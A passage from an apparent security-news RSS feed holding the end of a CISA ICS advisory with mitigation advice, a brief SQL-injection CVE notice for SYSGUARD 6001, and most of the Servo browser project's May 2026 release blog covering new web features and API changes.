</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Abhinav Agarwal reported these vulnerabilities to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities.</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>CISA also recommends users take the following measures to protect themselves from social engineering attacks:</p>
<p>Do not click web links or open attachments in unsolicited email messages.</p>
<p>Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.</p>
<p>Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.</p>
<p>No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-30</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-30</td>
<td>1</td>
<td>Initial Publication</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-8402 | SYSGUARD 6001 up to 2.0.1 sql injection (EUVD-2026-40296)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Eksagate Electronic Engineering and Computer Industry Trade SYSGUARD 6001 up to 2.0.1. Affected is an unknown function. Executing a manipulation can lead to sql injection. This vulnerability only affects products that are no longer s...]]></description>
<link>https://tsecurity.de/de/3635989/sicherheitsluecken/cve-2026-8402-sysguard-6001-up-to-201-sql-injection-euvd-2026-40296/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3635989/sicherheitsluecken/cve-2026-8402-sysguard-6001-up-to-201-sql-injection-euvd-2026-40296/</guid>
<pubDate>Tue, 30 Jun 2026 16:52:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/eksagate_electronic_engineering_and_computer_industry_trade:sysguard_6001">Eksagate Electronic Engineering and Computer Industry Trade SYSGUARD 6001 up to 2.0.1</a>. Affected is an unknown function. Executing a manipulation can lead to sql injection. This vulnerability only affects products that are no longer supported by the maintainer.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-8402">CVE-2026-8402</a>. The attack may be launched remotely. There is no exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[The Servo Blog: May in Servo: user scripts, mp4 compat, blackboxing in DevTools, and more!]]></title>
<description><![CDATA[Servo 0.3.0 contains all of the changes we landed in May, which came out to 391 commits (March: 534).
For security fixes, see § Security.

    

We’ve shipped several new web platform features:

‘font-kerning: none’ (@simonwuelker, #44634)
‘font-variant-east-asian’ (@simonwuelker, #44989)
‘font-v...]]></description>
<link>https://tsecurity.de/de/3634888/tools/the-servo-blog-may-in-servo-user-scripts-mp4-compat-blackboxing-in-devtools-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634888/tools/the-servo-blog-may-in-servo-user-scripts-mp4-compat-blackboxing-in-devtools-and-more/</guid>
<pubDate>Tue, 30 Jun 2026 10:07:49 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/servo/servo/releases/tag/v0.3.0"><strong>Servo 0.3.0</strong></a> contains all of the changes we landed in May, which came out to <strong>391 commits</strong> (March: 534).
For security fixes, see <a href="https://servo.org/blog/2026/06/30/may-in-servo/#security"><strong>§ Security</strong></a>.</p>
<figure>
    <a href="https://servo.org/img/blog/2026-06-diffie.png"><img alt="servoshell 0.3.0 showing several new features: the `document.execCommand()` commands ‘back­Color’, ‘create­Link’, ‘unlink’, ‘superscript’, ‘subscript’, and ‘remove­Format’, plus ‘font-kerning’ and ‘font-variant-ligatures’" src="https://servo.org/img/blog/2026-06-diffie.png"></a>
</figure>
<p>We’ve shipped several new web platform features:</p>
<ul>
<li><strong>‘font-kerning: none’</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44634">#44634</a>)</li>
<li><strong>‘font-variant-east-asian’</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44989">#44989</a>)</li>
<li><strong>‘font-variant-ligatures’</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44903">#44903</a>)</li>
<li><strong>‘font-variant-numeric’</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44950">#44950</a>)</li>
<li><strong>‘font-variant-position’</strong> (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/45142">#45142</a>)</li>
<li><strong>mp4</strong> files <strong>without fast start</strong> in <strong>&lt;video&gt;</strong> (<a href="https://github.com/calvaris">@calvaris</a>, <a href="https://github.com/servo/servo/pull/45084">#45084</a>)</li>
<li><code>&lt;form enctype="multipart/form-data"&gt;</code> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/45028">#45028</a>)</li>
<li><code>&lt;form enctype="text/plain"&gt;</code> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/45111">#45111</a>)</li>
<li><strong>&lt;![CDATA[]]&gt;</strong> layout (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44791">#44791</a>)</li>
</ul>
<p>Plus a bunch of new DOM APIs:</p>
<ul>
<li><strong>onslotchange</strong> property on <strong>Shadow­Root</strong> (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44688">#44688</a>)</li>
<li><strong>screen­Left</strong> and <strong>screen­Top</strong> on <strong>Window</strong> (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/servo/servo/pull/45128">#45128</a>)</li>
<li><strong>new Blob()</strong> with <code>{endings: "native"}</code> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44803">#44803</a>)</li>
<li><strong>new Performance­Mark()</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/servo/servo/pull/44702">#44702</a>)</li>
<li><strong>parse­HTML()</strong> on <strong>Document</strong> (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/44952">#44952</a>)</li>
<li><strong>read­As­Binary­String()</strong> on <strong>File­Reader</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44858">#44858</a>, <a href="https://github.com/servo/servo/pull/44921">#44921</a>)</li>
<li><strong>performance.measure()</strong> with mark values <strong>‘redirect­Start’</strong>, <strong>‘redirect­End’</strong>, <strong>‘secure­Connection­Start’</strong>, and <strong>‘response­End’</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/servo/servo/pull/44673">#44673</a>, <a href="https://github.com/servo/servo/pull/44624">#44624</a>, <a href="https://github.com/servo/servo/pull/44850">#44850</a>, <a href="https://github.com/servo/servo/pull/44739">#44739</a>)</li>
</ul>
<p>We’ve also fixed some build issues on Windows (<a href="https://github.com/mukilan">@mukilan</a>, <a href="https://github.com/servo/servo/pull/45079">#45079</a>), FreeBSD (<a href="https://github.com/delan">@delan</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/mukilan">@mukilan</a>, <a href="https://github.com/servo/servo/pull/44600">#44600</a>), and for anyone building Servo on NixOS or with Nix (<a href="https://github.com/freyacodes">@freyacodes</a>, <a href="https://github.com/servo/servo/pull/45051">#45051</a>, <a href="https://github.com/servo/servo/pull/45135">#45135</a>).</p>
<p>This is another big update, so here’s an outline:</p>
<ul>
<li>
<p><a href="https://servo.org/blog/2026/06/30/may-in-servo/#security"><strong>Security</strong></a><br>– memory safety fixes</p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/06/30/may-in-servo/#work-in-progress"><strong>Work in progress</strong></a><br>– execCommand(), Sanitizer, IndexedDB, accessibility, workers</p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/06/30/may-in-servo/#embedding-api"><strong>Embedding API</strong></a><br>– MSRV, cookies, preferences, diagnostics</p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/06/30/may-in-servo/#for-users-and-developers"><strong>For users and developers</strong></a><br>– <code>--host-file</code>, <code>--userscripts</code>, DevTools Debugger</p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/06/30/may-in-servo/#more-on-the-web-platform"><strong>More on the web platform</strong></a><br>– focus, forms, navigation, SubtleCrypto, WebGPU</p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/06/30/may-in-servo/#performance"><strong>Performance</strong></a><br>– about:memory, threads, layout, DOM, build times</p>
</li>
<li>
<p><a href="https://servo.org/blog/2026/06/30/may-in-servo/#stability"><strong>Stability</strong></a><br>– crashes, hangs, static analysis</p>
</li>
</ul>
<h3>Security <a class="header-anchor" href="https://servo.org/blog/2026/06/30/may-in-servo/#security">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>Servo’s JS runtime, <strong>SpiderMonkey 140.10.0</strong>, had several <strong>memory safety bugs</strong> that have been fixed in Servo 0.3.0 with the update to SpiderMonkey 140.10.1 (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44755">#44755</a>).
For more details, see <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-7322">CVE-2026-7322</a>, <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-7323">CVE-2026-7323</a>, and <a href="https://www.mozilla.org/en-US/security/advisories/mfsa2026-36/">MFSA 2026-36</a>.</p>
<h3>Work in progress <a class="header-anchor" href="https://servo.org/blog/2026/06/30/may-in-servo/#work-in-progress">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>We’re continuing to implement <strong>document.exec­Command()</strong> for <strong>rich text editing</strong>, under <code>--pref dom­_exec­_command­_enabled</code> (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/44735">#44735</a>, <a href="https://github.com/servo/servo/pull/44973">#44973</a>, <a href="https://github.com/servo/servo/pull/44887">#44887</a>).
This release adds support for the <strong>‘back­Color’</strong>, <strong>‘fore­Color’</strong>, <strong>‘create­Link’</strong>, <strong>‘unlink’</strong>, <strong>‘superscript’</strong>, <strong>‘subscript’</strong>, and <strong>‘remove­Format’</strong> commands (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/44644">#44644</a>, <a href="https://github.com/servo/servo/pull/44682">#44682</a>, <a href="https://github.com/servo/servo/pull/44657">#44657</a>, <a href="https://github.com/servo/servo/pull/44710">#44710</a>, <a href="https://github.com/servo/servo/pull/44677">#44677</a>), plus partial support for the <strong>‘insert­Paragraph’</strong> command (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/44909">#44909</a>).</p>
<p>We’re also working on the <strong>Sanitizer</strong> API, under <code>--pref dom­_sanitizer­_enabled</code>.
With the feature now enabled in servoshell’s experimental mode (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/44701">#44701</a>), this release adds support for <strong>set­Comments()</strong>, <strong>set­Data­Attributes()</strong>, <strong>allow­Processing­Instruction()</strong>, <strong>remove­Processing­Instruction()</strong>, and <strong>remove­Unsafe()</strong> on <strong>Sanitizer</strong> (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/44734">#44734</a>, <a href="https://github.com/servo/servo/pull/44983">#44983</a>).</p>
<p><strong>IndexedDB</strong> continues to improve, under <code>--pref dom­_indexeddb­_enabled</code>.
This release brings a more conformant <strong>abort()</strong> on <strong>IDB­Transaction</strong> (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/43950">#43950</a>).</p>
<p>All of the features above are enabled in servoshell’s experimental mode.</p>
<p>We’ve made more progress towards <strong>accessibility</strong> support, including the <a href="https://w3c.github.io/aria/#namefromcontent"><strong>name from contents</strong></a> algorithm (<a href="https://github.com/alice">@alice</a>, <a href="https://github.com/delan">@delan</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44439">#44439</a>) and several changes towards <strong>building the accessibility tree incrementally</strong> (<a href="https://github.com/alice">@alice</a>, <a href="https://github.com/delan">@delan</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44766">#44766</a>, <a href="https://github.com/servo/servo/pull/45035">#45035</a>, <a href="https://github.com/servo/servo/pull/45207">#45207</a>, <a href="https://github.com/servo/servo/pull/44768">#44768</a>, <a href="https://github.com/servo/servo/pull/44785">#44785</a>, <a href="https://github.com/servo/servo/pull/44801">#44801</a>, <a href="https://github.com/servo/servo/pull/44767">#44767</a>, <a href="https://github.com/servo/servo/pull/45029">#45029</a>).
The latter is critical for performance in real-world web content.</p>
<p>We’re now working on <strong>SharedWorker</strong> and <strong>ServiceWorker</strong>, under <code>--pref dom­_sharedworker­_enabled</code> and <code>--pref dom­_serviceworker­_enabled</code> respectively.
This release adds support for <strong>new Shared­Worker()</strong> (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/44761">#44761</a>), and parts of the ServiceWorker API (<a href="https://github.com/gterzian">@gterzian</a>, <a href="https://github.com/arihant2math">@arihant2math</a>, <a href="https://github.com/servo/servo/pull/45082">#45082</a>, <a href="https://github.com/servo/servo/pull/44787">#44787</a>).</p>
<h3>Embedding API <a class="header-anchor" href="https://servo.org/blog/2026/06/30/may-in-servo/#embedding-api">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>Servo now requires <strong>Rust 1.88.0</strong> or newer, up from the old MSRV of 1.86.0 (<a href="https://github.com/sagudev">@sagudev</a>, <a href="https://github.com/servo/servo/pull/44815">#44815</a>).
We run compile tests with the MSRV, but most of our testing is now done with Rust 1.95.0 (<a href="https://github.com/simonwuelker">@simonwuelker</a>, <a href="https://github.com/servo/servo/pull/44632">#44632</a>).</p>
<p><strong>Breaking changes</strong> to the <strong>cookies</strong> methods in our <a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><strong>SiteDataManager</strong></a> API (<a href="https://github.com/longvatrong111">@longvatrong111</a>, <a href="https://github.com/servo/servo/pull/44708">#44708</a>):</p>
<ul>
<li>
<p><a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><code>Site­Data­Manager</code></a>::<a href="https://doc.servo.org/servo/struct.SiteDataManager.html#method.clear_cookies"><code>clear­_cookies</code></a> now takes an additional <code>callback</code> argument, allowing it to be called async – to continue calling it sync, pass <code>None</code> as the <code>callback</code></p>
</li>
<li>
<p><a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><code>Site­Data­Manager</code></a>::<a href="https://doc.servo.org/servo/struct.SiteDataManager.html#method.clear_session_cookies"><code>clear­_session­_cookies</code></a> now takes an additional <code>callback</code> argument, allowing it to be called async – to continue calling it sync, pass <code>None</code> as the <code>callback</code></p>
</li>
<li>
<p><a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><code>Site­Data­Manager</code></a>::<a href="https://doc.servo.org/servo/struct.SiteDataManager.html#method.set_cookie_for_url"><code>set­_cookie­_for­_url</code></a> now takes an additional <code>callback</code> argument, allowing it to be called async – to continue calling it sync, pass <code>None</code> as the <code>callback</code></p>
</li>
<li>
<p><a href="https://doc.servo.org/servo/struct.SiteDataManager.html"><code>Site­Data­Manager</code></a>::<code>set­_cookie­_for­_url­_async</code> has been removed in favour of <a href="https://doc.servo.org/servo/struct.SiteDataManager.html#method.set_cookie_for_url"><code>set­_cookie­_for­_url</code></a> – to migrate, replace <code>set­_cookie­_for­_url­_async(​callback)</code> with <code>set­_cookie­_for­_url(​Some(​Box::new(​callback)))</code></p>
</li>
</ul>
<p><strong>Breaking changes</strong> to our <a href="https://doc.servo.org/servo/struct.Preferences.html"><strong>Preferences</strong></a> API (<a href="https://github.com/Narfinger">@Narfinger</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44307">#44307</a>):</p>
<ul>
<li>
<p><code>threadpools­_image­_cache­_workers­_max</code>, <code>threadpools­_indexeddb­_workers­_max</code>, and <code>threadpools­_webstorage­_workers­_max</code> have been <strong>removed</strong> in favour of a combined <a href="https://doc.servo.org/servo/struct.Preferences.html#structfield.thread_pool_workers_max"><code>thread­_pool­_workers­_max</code></a></p>
</li>
<li>
<p><code>threadpools­_fallback­_worker­_num</code> has been <strong>renamed</strong> to <a href="https://doc.servo.org/servo/struct.Preferences.html#structfield.thread_pool_fallback_workers"><code>thread­_pool­_fallback­_workers</code></a></p>
</li>
<li>
<p><code>threadpools­_async­_runtime­_workers­_max</code> has been <strong>renamed</strong> to <a href="https://doc.servo.org/servo/struct.Preferences.html#structfield.thread_pool_async_runtime_workers_max"><code>thread­_pool­_async­_runtime­_workers­_max</code></a></p>
</li>
<li>
<p><code>threadpools­_webrender­_workers­_max</code> has been <strong>renamed</strong> to <a href="https://doc.servo.org/servo/struct.Preferences.html#structfield.thread_pool_webrender_workers_max"><code>thread­_pool­_webrender­_workers­_max</code></a></p>
</li>
</ul>
<p>We’ve also reworked our <a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html"><strong>DiagnosticsLogging</strong></a> API (<a href="https://github.com/mukilan">@mukilan</a>, <a href="https://github.com/servo/servo/pull/44703">#44703</a>):</p>
<ul>
<li>
<p>You can now set options with <a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html"><code>DiagnosticsLogging</code></a>::<a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html#method.toggle_option"><code>toggle­_option</code></a>, and check if they are enabled with <a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html"><code>DiagnosticsLogging</code></a>::<a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html#method.is_enabled"><code>is­_enabled</code></a></p>
</li>
<li>
<p>Each option is a variant of <a href="https://doc.servo.org/servo/enum.DiagnosticsLoggingOption.html"><code>DiagnosticsLoggingOption</code></a>, a new type that also has useful methods for exposing these options in embedder UI</p>
</li>
<li>
<p><strong>(Breaking change)</strong> <a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html"><code>DiagnosticsLogging</code></a> no longer has <code>pub</code> fields representing each option – to migrate, replace field writes and field reads with <a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html#method.toggle_option"><code>toggle­_option</code></a> and <a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html#method.is_enabled"><code>is­_enabled</code></a> respectively</p>
</li>
<li>
<p><strong>(Breaking change)</strong> <a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html"><code>DiagnosticsLogging</code></a>::<a href="https://doc.servo.org/servo/struct.DiagnosticsLogging.html#method.extend_from_string"><code>extend­_from­_string</code></a> no longer accepts a <code>help</code> option – this option only existed to support servoshell’s <code>-Z help</code> / <code>--debug=help</code> option, so the code implementing it has been moved to servoshell</p>
</li>
</ul>
<h3>For users and developers <a class="header-anchor" href="https://servo.org/blog/2026/06/30/may-in-servo/#for-users-and-developers">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p><strong>servoshell</strong> has two new options:</p>
<ul>
<li>
<p>You can now configure the path to a <a href="https://en.wikipedia.org/w/index.php?title=Hosts_(file)&amp;oldid=1360805760"><strong>hosts file</strong></a> with <strong>--host-file=</strong> (singular), as an alternative to the <strong>HOST_FILE</strong> (singular) environment variable (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/servo/servo/pull/44880">#44880</a>).</p>
</li>
<li>
<p>You can now provide a directory of <strong>user scripts</strong> to run in every document with <strong>--userscripts=</strong> (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44754">#44754</a>).</p>
</li>
</ul>
<p>When using the <strong>Debugger</strong> tab in the Firefox <strong>DevTools</strong>:</p>
<ul>
<li>
<p>You can now <a href="https://antongunnarsson.com/devtools-blackbox/">“blackbox”</a> a script by clicking <strong>Ignore source</strong> (<a href="https://github.com/freyacodes">@freyacodes</a>, <a href="https://github.com/servo/servo/pull/44359">#44359</a>).
This prevents breakpoints from being hit inside that script, and it should also allow you to step through execution in the debugger without pausing inside that script.</p>
</li>
<li>
<p>The <strong>Scopes</strong> panel is more accurate now (<a href="https://github.com/atbrakhi">@atbrakhi</a>, <a href="https://github.com/eerii">@eerii</a>, <a href="https://github.com/servo/servo/pull/44765">#44765</a>).</p>
</li>
</ul>
<p>For developers of Servo itself, please note that <a href="https://book.servo.org/contributing/getting-started.html#ai-contributions">per project policy</a>, you <strong>must not</strong> use the output of <strong>large language models</strong> or other <strong>generative AI tools</strong> in your contributions.
To help us enforce that, we now have CI checks that reject AI agents as coauthors (<a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/delan">@delan</a>, <a href="https://github.com/servo/servo/pull/44723">#44723</a>).</p>
<p>We’ve also fixed build issues with <code>--features vello</code> (<a href="https://github.com/Gae24">@Gae24</a>, <a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44875">#44875</a>, <a href="https://github.com/servo/servo/pull/45036">#45036</a>).</p>
<h3>More on the web platform <a class="header-anchor" href="https://servo.org/blog/2026/06/30/may-in-servo/#more-on-the-web-platform">
        <span class="icon hashlink"><i class="fas fa-link"></i></span>
      </a></h3>
<p>We’ve improved the default appearance of <strong>&lt;dl&gt;</strong>, <strong>&lt;ol&gt;</strong>, <strong>&lt;ul&gt;</strong>, <strong>&lt;table&gt;</strong>, <strong>&lt;thead&gt;</strong>, <strong>&lt;tbody&gt;</strong>, <strong>&lt;tfoot&gt;</strong>, <strong>&lt;tr&gt;</strong>, <strong>&lt;td&gt;</strong>, <strong>&lt;th&gt;</strong>, <strong>&lt;dir&gt;</strong>, <strong>&lt;menu&gt;</strong>, and <strong>&lt;form&gt;</strong> (<a href="https://github.com/avis137">@avis137</a>, <a href="https://github.com/servo/servo/pull/44837">#44837</a>, <a href="https://github.com/servo/servo/pull/44920">#44920</a>).</p>
<p><strong>CryptoKey</strong> is now <strong>serializable</strong>, allowing it to be used in structuredClone() and postMessage() (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/45163">#45163</a>).</p>
<p>We’ve improved <strong>JS error messages</strong> in several parts of the DOM (<a href="https://github.com/n0blenote">@n0blenote</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/PuercoPop">@PuercoPop</a>, <a href="https://github.com/servo/servo/pull/44704">#44704</a>, <a href="https://github.com/servo/servo/pull/45186">#45186</a>, <a href="https://github.com/servo/servo/pull/44656">#44656</a>).</p>
<p>We’ve improved the conformance of <strong>form submission</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44943">#44943</a>, <a href="https://github.com/servo/servo/pull/44953">#44953</a>, <a href="https://github.com/servo/servo/pull/44954">#44954</a>, <a href="https://github.com/servo/servo/pull/44957">#44957</a>), <strong>tab navigation</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44684">#44684</a>), <strong>javascript: url navigation</strong> (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/servo/servo/pull/43490">#43490</a>), <strong>‘Refresh’ headers</strong> and <strong>&lt;meta http-equiv=Refresh&gt;</strong> (<a href="https://github.com/jschwe">@jschwe</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/45113">#45113</a>, <a href="https://github.com/servo/servo/pull/45116">#45116</a>), <strong>‘line-break: anywhere’</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/SimonSapin">@SimonSapin</a>, <a href="https://github.com/servo/servo/pull/44609">#44609</a>), <strong>assign()</strong> on <strong>Location</strong> (<a href="https://github.com/TG199">@TG199</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44298">#44298</a>), <strong>crypto.subtle.derive­Bits()</strong> (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/44706">#44706</a>), <strong>get­Computed­Style()</strong> (<a href="https://github.com/Loirooriol">@Loirooriol</a>, <a href="https://github.com/servo/servo/pull/44856">#44856</a>), <strong>performance.measure()</strong> (<a href="https://github.com/shubhamg13">@shubhamg13</a>, <a href="https://github.com/servo/servo/pull/44675">#44675</a>), <strong>read­As­Data­URL()</strong> on <strong>File­Reader</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44897">#44897</a>, <a href="https://github.com/servo/servo/pull/44924">#44924</a>), <strong>stream()</strong> on <strong>Blob</strong> (<a href="https://github.com/Taym95">@Taym95</a>, <a href="https://github.com/servo/servo/pull/45133">#45133</a>), and <strong>ML-KEM</strong> in <strong>Subtle­Crypto</strong> (<a href="https://github.com/kkoyung">@kkoyung</a>, <a href="https://github.com/servo/servo/pull/45153">#45153</a>).</p>
<p>We’ve also landed improvements to <strong>GPU­Supported­Limits</strong> (<a href="https://github.com/sagudev">@sagudev</a>, <a href="https://github.com/servo/servo/pull/45114">#45114</a>), <strong>GPU­Texture</strong> (<a href="https://github.com/sagudev">@sagudev</a>, <a href="https://github.com/servo/servo/pull/45154">#45154</a>), <strong>create­Bind­Group()</strong> on <strong>GPU­Device</strong> (<a href="https://github.com/sagudev">@sagudev</a>, <a href="https://github.com/servo/servo/pull/45140">#45140</a>), and other <strong>WebGPU</strong> features (<a href="https://github.com/sagudev">@sagudev</a>, <a href="https://github.com/servo/servo/pull/45097">#45097</a>).</p>
<p>We’ve fixed bugs related to <strong>&lt;svg&gt;</strong> with <strong>‘Content-Security-Policy’</strong> (<a href="https://github.com/TimvdLippe">@TimvdLippe</a>, <a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44974">#44974</a>), <strong>‘:active’</strong> (<a href="https://github.com/SharanRP">@SharanRP</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43953">#43953</a>), <strong>‘:hover’</strong> (<a href="https://github.com/SharanRP">@SharanRP</a>, <a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/43979">#43979</a>), <strong>‘align-items’</strong> (<a href="https://github.com/yezhizhen">@yezhizhen</a>, <a href="https://github.com/servo/servo/pull/44396">#44396</a>), <strong>‘border-image-outset’</strong> (<a href="https://github.com/lumiscosity">@lumiscosity</a>, <a href="https://github.com/servo/servo/pull/45039">#45039</a>), <strong>‘padding’</strong> with <strong>‘overflow: scroll’</strong> (<a href="https://github.com/stevennovaryo">@stevennovaryo</a>, <a href="https://github.com/servo/servo/pull/44263">#44263</a>), <strong>‘pointerup’ events</strong> (<a href="https://github.com/mrobinson">@mrobinson</a>, <a href="https://github.com/servo/servo/pull/44666">#44666</a>), <strong>‘slotchange’ events</strong> (<a href="https://github.com/jdm">@jdm</a>, <a href="https://github.com/servo/servo/pull/44688">#44688</a>), <strong>dynamic import()</strong> (<a href="https://github.com/Gae24">@Gae24</a>, <a href="https://github.com/servo/servo/pull/44741">#44741</a>), and <strong>clip()</strong> on 